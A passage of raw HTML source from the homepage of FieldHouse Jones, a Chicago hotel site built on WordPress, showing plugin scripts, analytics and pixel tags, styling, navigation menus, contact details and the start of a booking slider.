src='https://fieldhousejones.com/wp-includes/js/jquery/jquery.js,qver=1.12.4.pagespeed.jm.pPCPAKkkss.js'></script> <script type='text/javascript' src='https://fieldhousejones.com/wp-includes/js/jquery/jquery-migrate.min.js,qver=1.4.1.pagespeed.jm.C2obERNcWh.js'></script> <script type='text/javascript' src='https://fieldhousejones.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js,qver=5.4.6.2.pagespeed.jm.UWumStlplU.js'></script> <script type='text/javascript' src='https://fieldhousejones.com/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js,qver=5.4.6.2.pagespeed.jm.IWRAemrFyd.js'></script> <script type='text/javascript'>var SnazzyDataForSnazzyMaps=[];SnazzyDataForSnazzyMaps={"id":60422,"name":"Clear-map","description":"map clear - pastel color","url":"https:\/\/snazzymaps.com\/style\/60422\/clear-map","imageUrl":"https:\/\/snazzy-maps-cdn.azureedge.net\/assets\/60422-clear-map.png?v=20170524100911","json":"[{\"featureType\":\"administrative\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"on\"}]},{\"featureType\":\"administrative\",\"elementType\":\"labels.text.fill\",\"stylers\":[{\"color\":\"#444444\"}]},{\"featureType\":\"landscape\",\"elementType\":\"all\",\"stylers\":[{\"color\":\"#f2f2f2\"}]},{\"featureType\":\"landscape.man_made\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"on\"}]},{\"featureType\":\"landscape.natural\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"on\"}]},{\"featureType\":\"poi\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"off\"}]},{\"featureType\":\"poi.attraction\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"on\"}]},{\"featureType\":\"poi.business\",\"elementType\":\"geometry.fill\",\"stylers\":[{\"visibility\":\"on\"}]},{\"featureType\":\"poi.business\",\"elementType\":\"geometry.stroke\",\"stylers\":[{\"visibility\":\"on\"},{\"color\":\"#8f8f8f\"}]},{\"featureType\":\"poi.government\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"on\"}]},{\"featureType\":\"poi.medical\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"on\"}]},{\"featureType\":\"poi.park\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"on\"}]},{\"featureType\":\"poi.place_of_worship\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"on\"}]},{\"featureType\":\"poi.school\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"on\"}]},{\"featureType\":\"poi.sports_complex\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"on\"}]},{\"featureType\":\"road\",\"elementType\":\"all\",\"stylers\":[{\"saturation\":-100},{\"lightness\":45}]},{\"featureType\":\"road.highway\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"simplified\"}]},{\"featureType\":\"road.highway.controlled_access\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"on\"}]},{\"featureType\":\"road.arterial\",\"elementType\":\"labels.icon\",\"stylers\":[{\"visibility\":\"off\"}]},{\"featureType\":\"road.local\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"on\"}]},{\"featureType\":\"transit\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"off\"}]},{\"featureType\":\"transit.line\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"on\"}]},{\"featureType\":\"transit.station\",\"elementType\":\"all\",\"stylers\":[{\"visibility\":\"on\"}]},{\"featureType\":\"water\",\"elementType\":\"all\",\"stylers\":[{\"color\":\"#b4d4e1\"},{\"visibility\":\"on\"}]}]","views":483,"favorites":3,"createdBy":{"name":"Val\u00e9rie KOWALSKI","url":null},"createdOn":"2016-05-11T13:48:52.647","tags":["colorful","complex","light"],"colors":["blue","gray","multi"]};</script> <script type='text/javascript' src='https://fieldhousejones.com/wp-content/plugins/snazzy-maps/snazzymaps.js?ver=1.1.5'></script> <script type='text/javascript' src='https://fieldhousejones.com/wp-content/plugins/wyde-core/assets/js/modernizr.js.pagespeed.jm.yhmomJW0b1.js'></script> <link rel='https://api.w.org/' href='https://fieldhousejones.com/wp-json/'/> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://fieldhousejones.com/xmlrpc.php?rsd"/> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://fieldhousejones.com/wp-includes/wlwmanifest.xml"/> <meta name="generator" content="WordPress 5.2"/> <link rel='shortlink' href='https://fieldhousejones.com/'/> <link rel="alternate" type="application/json+oembed" href="https://fieldhousejones.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ffieldhousejones.com%2F"/> <link rel="alternate" type="text/xml+oembed" href="https://fieldhousejones.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ffieldhousejones.com%2F&#038;format=xml"/> <script type="text/javascript">var ajaxurl='https://fieldhousejones.com/wp-admin/admin-ajax.php';</script> <script type="text/javascript">(function(url){if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){return;}var addEvent=function(evt,handler){if(window.addEventListener){document.addEventListener(evt,handler,false);}else if(window.attachEvent){document.attachEvent('on'+evt,handler);}};var removeEvent=function(evt,handler){if(window.removeEventListener){document.removeEventListener(evt,handler,false);}else if(window.detachEvent){document.detachEvent('on'+evt,handler);}};var evts='contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');var logHuman=function(){if(window.wfLogHumanRan){return;}window.wfLogHumanRan=true;var wfscr=document.createElement('script');wfscr.type='text/javascript';wfscr.async=true;wfscr.src=url+'&r='+Math.random();(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);for(var i=0;i<evts.length;i++){removeEvent(evts[i],logHuman);}};for(var i=0;i<evts.length;i++){addEvent(evts[i],logHuman);}})('//fieldhousejones.com/?wordfence_lh=1&hid=054553A5678FDDF24FFF606685CA4CE0');</script><meta name="generator" content="Visual Composer 6.0.1"/> <meta name="generator" content="Powered by Slider Revolution 5.4.6.2 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface."/> <script type="text/javascript">function setREVStartSize(e){try{var i=jQuery(window).width(),t=9999,r=0,n=0,l=0,f=0,s=0,h=0;if(e.responsiveLevels&&(jQuery.each(e.responsiveLevels,function(e,f){f>i&&(t=r=f,l=e),i>f&&f>r&&(r=f,n=e)}),t>r&&(l=n)),f=e.gridheight[l]||e.gridheight[0]||e.gridheight,s=e.gridwidth[l]||e.gridwidth[0]||e.gridwidth,h=i/s,h=h>1?1:h,f=Math.round(h*f),"fullscreen"==e.sliderLayout){var u=(e.c.width(),jQuery(window).height());if(void 0!=e.fullScreenOffsetContainer){var c=e.fullScreenOffsetContainer.split(",");if(c)jQuery.each(c,function(e,i){u=jQuery(i).length>0?u-jQuery(i).outerHeight(!0):u}),e.fullScreenOffset.split("%").length>1&&void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0?u-=jQuery(window).height()*parseInt(e.fullScreenOffset,0)/100:void 0!=e.fullScreenOffset&&e.fullScreenOffset.length>0&&(u-=parseInt(e.fullScreenOffset,0))}f=u}else void 0!=e.minHeight&&f<e.minHeight&&(f=e.minHeight);e.c.closest(".rev_slider_wrapper").css({height:f})}catch(d){console.log("Failure at Presize of Slider:"+d)}};</script> <style type="text/css" id="wp-custom-css">h2.ultb3-title{text-shadow:1px 4px rgba(0,0,0,.99)}.dropdown-nav>ul>li>a{padding:0 14px}</style> <style type="text/css" title="dynamic-css" class="options-output">#side-nav{background-color:#211f1e;background-size:cover;background-position:center bottom}#footer-bottom{color:#fff}#footer-bottom{background-color:#222;background-size:cover;background-position:center bottom}.archive.category .main-content,.archive.author .main-content,.archive.date .main-content{background-size:cover;background-position:center center}.archive.tax-portfolio_category .main-content,.archive.tax-portfolio_skill .main-content,.archive.tax-portfolio_tag .main-content{background-size:cover;background-position:center center}body{font-family:"Roboto Condensed",Arial,Helvetica,sans-serif;font-weight:normal;color:#333;font-size:16px}#top-nav .top-menu>li>a,#full-nav,.live-search-form input{font-family:Roboto,Arial,Helvetica,sans-serif;font-weight:400;font-size:18px}.w-button,.w-link-button,.w-ghost-button,a.button,button,input[type="submit"],input[type="button"],input[type="reset"]{font-family:Roboto,Arial,Helvetica,sans-serif;letter-spacing:.5px;font-weight:400}h1{font-family:Roboto,Arial,Helvetica,sans-serif;font-weight:400;font-size:40px}h2,.w-masonry .item-0 .post-title{font-family:Roboto,Arial,Helvetica,sans-serif;font-weight:900;font-size:28px}h3{font-family:Roboto,Arial,Helvetica,sans-serif;font-weight:400;font-size:22px}h4{font-family:Roboto,Arial,Helvetica,sans-serif;font-weight:400;font-style:normal}h5,.post-date strong{font-family:Roboto,Arial,Helvetica,sans-serif;font-weight:400;font-style:normal}h6,blockquote{font-family:Roboto,Arial,Helvetica,sans-serif;font-weight:400;font-style:normal}</style><style type="text/css" data-name="overlap-color-scheme">a, #header #top-nav li:hover > a, #header #top-nav li.current-menu-ancestor > a, #header #top-nav li.current-menu-item > a, .vertical-menu li.back-to-parent:hover > span, .vertical-menu li:hover > a, .vertical-menu .current-menu-ancestor > a, .vertical-menu .current-menu-item > a, .w-dark #full-nav .vertical-menu li.back-to-parent:hover > span, .w-dark #full-nav .vertical-menu li:hover > a, .w-dark #full-nav .vertical-menu .current-menu-ancestor > a, .w-dark #full-nav .vertical-menu .current-menu-item > a, #fullscreen-nav.w-dark .social-icons > li:hover a, #side-menu li:hover > a, .w-light .sliding-remove-button:hover, .w-text-light .dropcap, .highlight, blockquote:before, button:hover, input[type="submit"]:hover, input[type="button"]:hover, .w-blog-posts .post-title a:hover, .post-nav .nav-home a:hover, .post-nav h4 a:hover, .prev-post > a:hover, .next-post > a:hover, .post-tags a:hover, .widget a:hover, .related-posts li:hover h4 a, .w-pricing-box .box-header h4, .w-testimonial .w-content:before, .w-link-button:not(.none):not(.outline):hover, .w-link-button:not(.none):active, .w-link-button.none, .w-link-button.none:hover, .w-link-button.none:active, .w-link-button.outline, .w-testimonials-slider .owl-nav > div, .w-testimonials-slider .owl-nav > div:hover, .w-team-slider .cover-image, .w-team-slider .member-name h4, .w-team-slider .w-grid-layout .member-name h3 > span, .w-heading.heading-6 h2, .w-heading:not(.heading-6):not(.heading-7) .subheading, .w-photoset .w-item figcaption h3:hover a, .w-link-button.outline.w-with-icon:hover, .post .post-date a strong, .post-meta a, .pagination > span > a:hover, .w-blog-posts .no-cover.format-audio .post-media-icon, .w-blog-posts .no-cover.format-video .post-media-icon, .meta-date a strong, .format-quote .post-detail .post-title:before, .title-wrapper .subtitle, .title-wrapper .title strong, .member-content .member-meta, .w-counter-box, .post-share a:hover, .w-blog-posts .post.format-quote .post-title a:before, .post .meta-date a strong, .w-text-block ul > li:before, .widget_shopping_cart .total .amount, .woocommerce-message:before, .woocommerce-info:before, .star-rating:before, .star-rating span:before, .stars a:hover, .products li .price, .woocommerce button.button:hover, .woocommerce .buttons .button:hover, .wc-proceed-to-checkout .button:hover, .my_account_orders a.button:hover, .add_to_cart_inline .button:hover, .order-total .amount, .summary .single_variation .price ins .amount, .menu-my-account a:hover {color:#d33}.w-link-button, .title-wrapper:not(.w-size-s) .title:after, .w-icon-tabs .w-tabs-nav li.active a, .w-icon-tabs .w-tabs-nav li.active, .sliding-remove-button:hover, .w-blog-posts .readmore-link a, code, .w-icon-tabs.w-tabs .w-tabs-nav li.active, .loader-border, .loader-timer > div, .w-blog-posts.w-large .w-item > .post.sticky, .w-blog-posts.w-grid .w-item > .post.sticky, .widget .tagcloud a:hover, .variation, .shop_table .quantity input:focus, .shop_table .quantity input:hover {border-color:#d33}.dropdown-nav ul ul,.w-tabs .w-tabs-nav li.active{border-top-color:#d33}.w-testimonials-slider .w-border, .w-testimonial .w-header:after, .w-testimonial .w-customer p:after, .w-link-button:not(.none) .w-border, .w-link-button.outline:hover .w-border, .w-link-button.outline:active .w-border, .w-pricing-box .box-button:hover a, .w-portfolio-grid.w-overlap .w-showmore a, .w-blog-posts .readmore-link a:hover, .w-heading.heading-7 h2:before, .w-heading.heading-7 h2:after, .w-tabs .w-tabs-nav li.active:before, .w-icon-tabs .w-tabs-nav li.active a:after, #header .mobile-nav-icon > .menu-icon, #header .mobile-nav-icon > .menu-icon:before, #header .mobile-nav-icon > .menu-icon:after, .full-nav-icon:hover > .menu-icon, .full-nav-icon:hover > .menu-icon:before, .full-nav-icon:hover > .menu-icon:after, .post-nav span a, #fullscreen-nav.w-light:before, #live-search.w-light:before, #toplink-button .border:before, .w-twitter .profile-image img, #wp-calendar tbody td#today:hover, #cancel-comment-reply-link:hover, .loader-inner, .loader-timer > div:before, .loader-timer > div:after, .onsale, .cart-items, .widget_price_filter .ui-slider .ui-slider-range, .widget_price_filter .ui-slider .ui-slider-handle, .products li figure .button, .w-portfolio-grid.w-layout-overlap .w-showmore a, .w-effect-overlap figure, .pagination>span.w-previous:after, .pagination>span.w-next:before {background:#d33}.w-tour .w-tabs-nav li.active a,.w-accordion .active .acd-header,.w-accordion .active:hover .acd-header,.w-toggle.active>h4,.w-ghost-button,.w-ghost-button:hover,.w-tabs .w-tabs-nav li.active a{color:#d33;border-color:#d33}.w-button, button, input[type="submit"], input[type="button"], :not(:required) input[type="checkbox"]:checked, :not(:required) input[type="radio"]:checked, .comments-nav a:hover, .loader-square-spin > div, .ball-pulse > div, .woocommerce button.button, .woocommerce .buttons .button, .wc-proceed-to-checkout .button, .my_account_orders a.button, .add_to_cart_inline .button {border-color:#d33;background:#d33}.single-product .woocommerce-tabs ul.tabs li.active{box-shadow:0 1px 0 #d33}.loader-circle{box-shadow:inset 0 0 0 3px #d33}.loader-line-mask .loader-line{box-shadow:inset 0 0 0 4px #d33}</style><link rel="shortcut icon" href="https://fieldhousejones.com/wp-content/uploads/2016/08/xfavicon.png.pagespeed.ic.q-U51jgrnO.png"> <link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://fieldhousejones.com/wp-content/uploads/2016/08/xfavicon.png.pagespeed.ic.q-U51jgrnO.png"> <link rel="apple-touch-icon-precomposed" sizes="114x114" href="https://fieldhousejones.com/wp-content/uploads/2016/08/xfavicon.png.pagespeed.ic.q-U51jgrnO.png"> <link rel="apple-touch-icon-precomposed" sizes="72x72" href="https://fieldhousejones.com/wp-content/uploads/2016/08/xfavicon.png.pagespeed.ic.q-U51jgrnO.png"> <link rel="apple-touch-icon-precomposed" href="https://fieldhousejones.com/wp-content/uploads/2016/08/xfavicon.png.pagespeed.ic.q-U51jgrnO.png"> <style>.tp-caption.BigBold-Button,.BigBold-Button{background:#046bad!important}.w-text-dark .dropdown-nav a, .w-transparent.w-text-dark:not(.w-fixed) .dropdown-nav > ul > li > a {color:#000}.dropdown-nav>ul>li>a{padding:0 16px}@media only screen and (max-width:1300px){.dropdown-nav>ul>li>a{padding:0 8px!important}}@media only screen and (max-width:1200px){.dropdown-nav>ul>li>a{padding:0 6px!important}}@media only screen and (max-width:400px){#cloudbeds{width:320px}}</style> <!-- Google Tag Manager --> <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-KMXVZNH');</script> <!-- End Google Tag Manager --> <!-- Facebook Pixel Code --> <script>!function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,document,'script','https://connect.facebook.net/en_US/fbevents.js');fbq('init','1844080222305002');fbq('track','PageView');</script> <noscript> <img height="1" width="1" src="https://www.facebook.com/tr?id=1844080222305002&ev=PageView &noscript=1"/> </noscript> <!-- End Facebook Pixel Code --> </head> <body data-rsssl=1 class="home page-template-default page page-id-2020 classic-nav no-title"> <!-- Google Tag Manager (noscript) --> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MRJB26F" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <!-- End Google Tag Manager (noscript) --> <aside id="side-nav" class="w-text-light"> <div class="side-nav-wrapper"> <nav id="vertical-nav"> <ul class="vertical-menu"> <li id="vertical-menu-item-5646" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5646"><a href="https://fieldhousejones.com/about/">About<span></span></a></li> <li id="vertical-menu-item-5645" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5645"><a href="https://fieldhousejones.com/rooms/">Rooms<span></span></a></li> <li id="vertical-menu-item-7420" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7420"><a href="https://fieldhousejones.com/dine-drink/">Dine &#038; Drink<span></span></a></li> <li id="vertical-menu-item-7421" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7421"><a href="https://fieldhousejones.com/events/">Events<span></span></a></li> <li id="vertical-menu-item-5853" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5853"><a href="https://fieldhousejones.com/gallery/">Gallery<span></span></a></li> <li id="vertical-menu-item-7614" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7614"><a href="https://fieldhousejones.com/specials/">Specials<span></span></a></li> <li id="vertical-menu-item-5644" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5644"><a href="https://fieldhousejones.com/contact/">Contact<span></span></a></li> <li id="vertical-menu-item-6053" class="menu_butten menu-item menu-item-type-post_type menu-item-object-page menu-item-6053"><a href="https://fieldhousejones.com/booking/">Book Now<span></span></a></li> </ul> </nav> <ul id="side-menu"> </ul> <ul class="contact-info"> <li><a style="color: #000" href="tel:312-291-9922"><i class="ol-phone"></i> 312-291-9922</a></li> <li><i class="ol-mail"></i><a style="color: #000" href="mailto:[email protected]">[email protected]</a></li> <li><i class="ol-location"></i><a style="color: #000" href="https://www.google.com/maps?ll=41.897255,-87.640344&amp;z=18&amp;t=m&amp;hl=en-US&amp;gl=US&amp;mapclient=embed&amp;q=312+W+Chestnut+St+Chicago,+IL+60610">312 W. Chestnut St. Chicago, IL 60610</a></li> </ul> <ul class="social-icons"><li><a href="https://www.facebook.com/FieldHouse-Jones-1004453812998817/?ref=br_rs" target="_blank" title="Facebook"><i class="ol-facebook"></i></a></li><li><a href="https://plus.google.com/113333608272260527376" target="_blank" title="Google+"><i class="ol-google-plus"></i></a></li><li><a href="https://www.instagram.com/fieldhousejones/" target="_blank" title="Instagram"><i class="ol-instagram"></i></a></li><li><a href="https://twitter.com/fieldhousejones" target="_blank" title="Twitter"><i class="ol-twitter"></i></a></li></ul> </div> </aside><header id="header" class="w-light w-sticky w-full w-transparent w-text-dark"> <div class="container"> <span class="mobile-nav-icon"> <i class="menu-icon"></i> </span> <span id="header-logo"> <a href="https://fieldhousejones.com"> <img class="dark-logo" src="https://fieldhousejones.com/wp-content/uploads/2016/09/FHJ-Black.png.pagespeed.ce.NK9fgpwr2l.png" width="698" height="151" alt="FieldHouse Jones"/> <img class="dark-sticky" src="https://fieldhousejones.com/wp-content/uploads/2016/09/FHJ-Black.png.pagespeed.ce.NK9fgpwr2l.png" width="698" height="151" alt="FieldHouse Jones"/> <img class="light-logo" src="https://fieldhousejones.com/wp-content/uploads/2016/09/Fieldhouse-Jones.png.pagespeed.ce.trZAwYdCn3.png" width="698" height="150" alt="FieldHouse Jones"/> <img class="light-sticky" src="https://fieldhousejones.com/wp-content/uploads/2016/09/Fieldhouse-Jones.png.pagespeed.ce.trZAwYdCn3.png" width="698" height="150" alt="FieldHouse Jones"/> </a> </span> <nav id="top-nav" class="dropdown-nav"> <ul class="top-menu"> <li id="menu-item-5646" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5646"><a href="https://fieldhousejones.com/about/">About</a></li> <li id="menu-item-5645" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5645"><a href="https://fieldhousejones.com/rooms/">Rooms</a></li> <li id="menu-item-7420" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7420"><a href="https://fieldhousejones.com/dine-drink/">Dine &#038; Drink</a></li> <li id="menu-item-7421" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7421"><a href="https://fieldhousejones.com/events/">Events</a></li> <li id="menu-item-5853" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5853"><a href="https://fieldhousejones.com/gallery/">Gallery</a></li> <li id="menu-item-7614" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-7614"><a href="https://fieldhousejones.com/specials/">Specials</a></li> <li id="menu-item-5644" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5644"><a href="https://fieldhousejones.com/contact/">Contact</a></li> <li id="menu-item-6053" class="menu_butten menu-item menu-item-type-post_type menu-item-object-page menu-item-6053"><a href="https://fieldhousejones.com/booking/">Book Now</a></li> <li class="menu-item-slidingbar"> <a href="#"><i class="sliding-icon"></i></a> </li> </ul> </nav> </div> </header><div id="slidingbar" class="w-light"> <a href="#" class="sliding-remove-button"><i class="ol-cancel"></i></a> <div class="slidingbar-wrapper"> <div class="sliding-widgets"> <div class="widget widget_text"> <div class="textwidget"><img style="width:80%; height: auto; margin: 20px auto;" src="/wp-content/uploads/2016/09/FHJ-Black.png.pagespeed.ce.NK9fgpwr2l.png" alt="Fieldhouse-Jones-white" class="aligncenter size-full"/> <iframe src="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2969.7340199520427!2d-87.63860568473152!3d41.89857697211189!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x880fd34a4fc6313d%3A0x66f29365ab67c2d9!2s312+W+Chestnut+Street%2C+Chicago%2C+IL+60610!5e0!3m2!1sen!2sus!4v1471886704085" frameborder="0" style="border:0" allowfullscreen></iframe></div> </div> </div> <ul class="contact-info"> <li><a style="color: #000" href="tel:312-291-9922"><i class="ol-phone"></i> 312-291-9922</a></li> <li><i class="ol-mail"></i><a style="color: #000" href="mailto:[email protected]">[email protected]</a></li> <li><i class="ol-location"></i><a style="color: #000" href="https://www.google.com/maps?ll=41.897255,-87.640344&amp;z=18&amp;t=m&amp;hl=en-US&amp;gl=US&amp;mapclient=embed&amp;q=312+W+Chestnut+St+Chicago,+IL+60610">312 W. Chestnut St. Chicago, IL 60610</a></li> </ul> <ul class="social-icons"><li><a href="https://www.facebook.com/FieldHouse-Jones-1004453812998817/?ref=br_rs" target="_blank" title="Facebook"><i class="ol-facebook"></i></a></li><li><a href="https://plus.google.com/113333608272260527376" target="_blank" title="Google+"><i class="ol-google-plus"></i></a></li><li><a href="https://www.instagram.com/fieldhousejones/" target="_blank" title="Instagram"><i class="ol-instagram"></i></a></li><li><a href="https://twitter.com/fieldhousejones" target="_blank" title="Twitter"><i class="ol-twitter"></i></a></li></ul> </div> </div> <div id="page-overlay"></div><div id="live-search" class="w-light"> <div class="container"> <form id="live-search-form" class="live-search-form clear" action="https://fieldhousejones.com" method="get"> <input type="hidden" name="wyde_search_post_types" value="page,post"/> <input type="hidden" name="wyde_search_suggestions" value="5"/> <input type="text" name="s" id="wyde-search-keyword" value="" placeholder="Start Typing..."/> <a href="#" class="fullscreen-remove-button"><i class="ol-cancel"></i></a> </form> </div> </div> <script>window.onload=function(){$("#menu-item-6053").children().attr("id","nav-cta")};</script><div id="content"> <div class="main-content full-width no-sidebar"> <section class="w-section w-full m-padding vc_custom_1468183185761"> <div class="row"><div class="col col-12 no-padding"> <div class="col-inner"><div class="w-revslider"> <link href="https://fonts.googleapis.com/css?family=Questrial:400%7COpen+Sans:700%2C500" rel="stylesheet" property="stylesheet" type="text/css" media="all"> <div id="rev_slider_1_1_wrapper" class="rev_slider_wrapper fullscreen-container" data-source="gallery" style="background:#111111;padding:0px;"> <!-- START REVOLUTION SLIDER 5.4.6.2 fullscreen mode --> <div id="rev_slider_1_1" class="rev_slider fullscreenbanner" style="display:none;" data-version="5.4.6.2"> <ul> <!-- SLIDE --> <li data-index="rs-1" data-transition="slidingoverlayhorizontal" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="default" data-delay="9300" data-rotate="0" data-fstransition="fade" data-fsmasterspeed="1500" data-fsslotamount="7" data-saveperformance="off" data-title="Adventure" data-param1="" data-param2="" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description=""> <!-- MAIN IMAGE --> <img src="https://fieldhousejones.com/wp-content/uploads/2017/10/Debra-Exterior-Small.jpg.pagespeed.ce.zpSu0UTctO.jpg" alt="" title="FieldHouse Exterior" width="1395" height="1100" data-bgposition="center top" data-bgfit="cover" data-bgrepeat="no-repeat" data-bgparallax="10" class="rev-slidebg" data-no-retina> <!-- LAYERS --> <!-- LAYER NR. 1 --> <div class="tp-caption tp-shape tp-shapewrapper " id="slide-1-layer-16" data-x="['center','center','center','center']" data-hoffset="['0','0','0','0']" data-y="['bottom','bottom','bottom','bottom']" data-voffset="['0','0','0','0']" data-width="full" data-height="['full','full','full','full']" data-whitespace="nowrap" data-type="shape" data-basealign="slide" data-responsive_offset="off" data-responsive="off" data-frames='[{"delay":650,"speed":1360,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power2.easeInOut"},{"delay":"wait","speed":700,"frame":"999","to":"opacity:0;","ease":"nothing"}]' data-textAlign="['left','left','left','left']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5;background-color:rgba(0,0,0,0.5);background:linear-gradient(to bottom, rgba(0,0,0,0) 0%,rgba(0,0,0,0.8) 100%);cursor:default;"> </div> <!-- LAYER NR. 2 --> <div class="tp-caption tp-resizeme slider-wdiget" id="slide-1-layer-21" data-x="['center','center','center','center']" data-hoffset="['0','0','0','0']" data-y="['middle','middle','middle','middle']" data-voffset="['-400','-400','-400','-400']" data-width="400" data-height="none" data-whitespace="normal" data-visibility="['off','off','off','off']" data-type="text" data-responsive_offset="on" data-frames='[{"delay":650,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power2.easeInOut"},{"delay":"wait","speed":0,"frame":"999","to":"opacity:0;","ease":"nothing"}]' data-textAlign="['left','left','left','left']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 6; min-width: 400px; max-width: 400px; white-space: normal; font-size: 20px; line-height: 22px; font-weight: 400; color: rgba(255,255,255,1); letter-spacing: px;font-family:Questrial;"><div class="slider-font"><div class="wpb_widgetised_column wpb_content_element"> <div class="wpb_wrapper"> <div class="widget widget_text"> <div class="textwidget">Testing This are for the slider -- what ever goes in the Shop widget Will show up on the slider... Just have to keep in mind spacing... so not sure having the button and the social media will work anymore... unless this is set and very little changes.</div> </div> </div> </div> </div> </div> <!-- LAYER NR. 3 --> <div class="tp-caption tp-resizeme" id="slide-1-layer-19" data-x="['center','center','center','center']" data-hoffset="['1','1','1','1']" data-y="['middle','middle','middle','middle']" data-voffset="['0','0','0','0']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="image" data-responsive_offset="on" data-frames='[{"delay":760,"speed":1460,"frame":"0","from":"y:50px;opacity:0;","to":"o:1;","ease":"Power2.easeInOut"},{"delay":"wait","speed":100,"frame":"999","to":"auto:auto;","ease":"nothing"}]' data-textAlign="['left','left','left','left']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 7;"><img src="https://fieldhousejones.com/wp-content/uploads/2016/09/Fieldhouse-Jones.png.pagespeed.ce.trZAwYdCn3.png" alt="" data-ww="" data-hh="" width="698" height="150" data-no-retina> </div> <!-- LAYER NR. 4 --> <div class="tp-caption BigBold-Button rev-btn " id="slide-1-layer-7" data-x="['center','center','center','center']" data-hoffset="['0','0','0','0']" data-y="['bottom','middle','middle','middle']" data-voffset="['130','120','119','200']" data-fontsize="['16','13','13','13']" data-lineheight="['18','13','13','13']" data-fontweight="['700','500','500','700']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="button" data-actions='[{"event":"click","action":"simplelink","target":"_self","url":"\/booking","delay":""}]' data-basealign="slide" data-responsive_offset="off" data-responsive="off" data-frames='[{"delay":650,"speed":1610,"frame":"0","from":"y:[100%];z:0;rX:0deg;rY:0;rZ:0;sX:1;sY:1;skX:0;skY:0;opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":700,"frame":"999","to":"y:50px;opacity:0;","ease":"Power2.easeInOut"},{"frame":"hover","speed":"300","ease":"Power1.easeInOut","to":"o:1;rX:0;rY:0;rZ:0;z:0;","style":"c:rgba(255,255,255,1);bg:rgba(4,107,173,1);bc:rgba(255,255,255,1);br:0px 0px 0px 0px;"}]' data-textAlign="['center','center','center','center']" data-paddingtop="[10,10,10,10]" data-paddingright="[12,12,12,12]" data-paddingbottom="[10,10,10,10]" data-paddingleft="[12,12,12,12]" style="z-index: 8; white-space: nowrap; font-size: 16px; line-height: 18px; font-weight: 700; letter-spacing: px;font-family:Open Sans;border-color:rgba(4,107,173,0.50);border-width:2px 2px 2px 2px;border-radius:2px 2px 2px 2px;outline:none;box-shadow:none;box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;cursor:pointer;">BOOK NOW 